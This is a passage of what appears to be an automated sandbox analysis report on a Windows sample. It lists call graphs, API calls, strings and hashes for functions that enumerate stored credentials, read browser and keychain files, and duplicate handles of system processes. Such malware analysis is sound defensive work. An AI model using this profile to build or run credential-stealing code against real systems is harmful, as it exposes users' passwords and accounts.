API calls 40234->40237 40239 416935 16 API calls 40235->40239 40301 444283 13 API calls 40236->40301 40237->40241 40239->40243 40241->40218 40299 42453e 123 API calls 40241->40299 40242 437612 memcpy 40242->40243 40243->40177 40244->40216 40245->40161 40246->40181 40247->40178 40248->40181 40249->40161 40250->40186 40251->40196 40252->40192 40253->40186 40254->40186 40256 41bc3b 101 API calls 40255->40256 40257 41f1b4 40256->40257 40258 41edad 86 API calls 40257->40258 40265 41f282 40257->40265 40259 41f1cb 40258->40259 40260 41f1f5 memcmp 40259->40260 40261 41f20e 40259->40261 40259->40265 40260->40261 40262 41f21b memcmp 40261->40262 40261->40265 40263 41f326 40262->40263 40266 41f23d 40262->40266 40264 41ee6b 86 API calls 40263->40264 40263->40265 40264->40265 40265->40205 40266->40263 40267 41f28e memcmp 40266->40267 40269 41c8df 56 API calls 40266->40269 40267->40263 40268 41f2a9 40267->40268 40268->40263 40271 41f308 40268->40271 40272 41f2d8 40268->40272 40270 41f269 40269->40270 40270->40263 40273 41f287 40270->40273 40274 41f27a 40270->40274 40271->40263 40278 4446ce 11 API calls 40271->40278 40275 41ee6b 86 API calls 40272->40275 40273->40267 40276 41ee6b 86 API calls 40274->40276 40277 41f2e0 40275->40277 40276->40265 40279 41b1ca memset 40277->40279 40278->40263 40279->40265 40280->40205 40281->40205 40282->40205 40283->40199 40284->40200 40286 417044 40285->40286 40287 41705c 40285->40287 40289 416760 11 API calls 40286->40289 40291 417055 40286->40291 40288 417075 40287->40288 40290 41707a 11 API calls 40287->40290 40288->40211 40289->40291 40290->40286 40291->40211 40292->40243 40293->40216 40294->40216 40295->40216 40296->40216 40297->40216 40298->40234 40299->40218 40300->40232 40301->40242 40307 415cfe 40302->40307 40311 415d23 __aullrem __aulldvrm 40307->40311 40314 41628e 40307->40314 40308 4163ca 40321 416422 11 API calls 40308->40321 40310 416172 memset 40310->40311 40311->40308 40311->40310 40312 416422 10 API calls 40311->40312 40313 415cb9 10 API calls 40311->40313 40311->40314 40312->40311 40313->40311 40315 416520 40314->40315 40316 416527 40315->40316 40320 416574 40315->40320 40317 416544 40316->40317 40316->40320 40322 4156aa 11 API calls 40316->40322 40319 416561 memcpy 40317->40319 40317->40320 40319->40320 40320->40114 40321->40314 40322->40317 40344 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37694 4260a1 37691->37694 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37699 429a7a 37739 416760 11 API calls 37699->37739 37705->37686 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37699 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37781 41be69 37781->37762 37781->37772 37783 41bee7 37783->37781 37816 41a453 86 API calls 37783->37816 37785->37781 37785->37783 37786 41bf3a 37785->37786 37787 41bed1 37785->37787 37815 4446ce 11 API calls 37786->37815 37789 41bef0 37787->37789 37792 41bee2 37787->37792 37789->37783 37790 41bf01 37789->37790 37791 41bf24 memset 37790->37791 37793 41bf14 37790->37793 37813 418a6d memset memcpy memset 37790->37813 37791->37781 37802 41ac13 37792->37802 37814 41a223 memset memcpy memset 37793->37814 37797 41bf20 37797->37791 37801 418c72 37798->37801 37799 418d51 memset memset 37800 418c94 37799->37800 37800->37785 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37808 41aca1 37807->37808 37818 41519d 37807->37818 37808->37805 37810 41acc0 memset 37808->37810 37811 41accd memcpy 37808->37811 37810->37805 37811->37805 37812->37781 37813->37793 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37808 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 CloseHandle 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39794 4147f3 39797 414561 39794->39797 39796 414813 39798 41456d 39797->39798 39799 41457f GetPrivateProfileIntW 39797->39799 39802 4143f1 memset _itow WritePrivateProfileStringW 39798->39802 39799->39796 39801 41457a 39801->39796 39802->39801

                                                              Executed Functions

                                                              Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2263259095-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                              Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                              Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 4165125987-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
